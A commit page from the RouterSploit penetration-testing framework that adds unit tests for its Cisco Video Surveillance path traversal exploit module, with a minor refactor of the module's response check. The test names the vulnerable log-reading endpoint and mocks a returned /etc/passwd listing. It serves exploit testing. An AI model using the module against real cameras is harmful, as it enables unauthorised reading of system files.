Unverified Commit b6f3ac37 by Marcin Bury Committed by GitHub

Adding tests for Cisco Video Surveillance Path Traversal module (#520)

parent f32e08d3
......@@ -32,10 +32,8 @@ class Exploit(HTTPClient):
method="GET",
path=path
)
if response is None:
return
if response.status_code == 200 and len(response.text):
if response and response.status_code == 200 and len(response.text):
print_success("Exploit success")
print_status("Reading file: {}".format(self.filename))
print_info(response.text)
......
from routersploit.modules.exploits.cameras.cisco.video_surv_path_traversal import Exploit
def test_check_success(target):
""" Test scenario - successul check """
route_mock = target.get_route_mock("/BWT/utils/logs/read_log.jsp", methods=["GET"])
route_mock.return_value = (
"admin:x:0:0:root:/root:/bin/bash"
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
"bin:x:2:2:bin:/bin:/usr/sbin/nologin"
"sys:x:3:3:sys:/dev:/usr/sbin/nologin"
"sync:x:4:65534:sync:/bin:/bin/sync"
"games:x:5:60:games:/usr/games:/usr/sbin/nologin"
"man:x:6:12:man:/var/cache/man:/usr/sbin/nologin"
"lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin"
"mail:x:8:8:mail:/var/mail:/usr/sbin/nologin"
"news:x:9:9:news:/var/spool/news:/usr/sbin/nologin"
"uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin"
"proxy:x:13:13:proxy:/bin:/usr/sbin/nologin"
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
"backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
assert exploit.check()
assert exploit.run() is None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment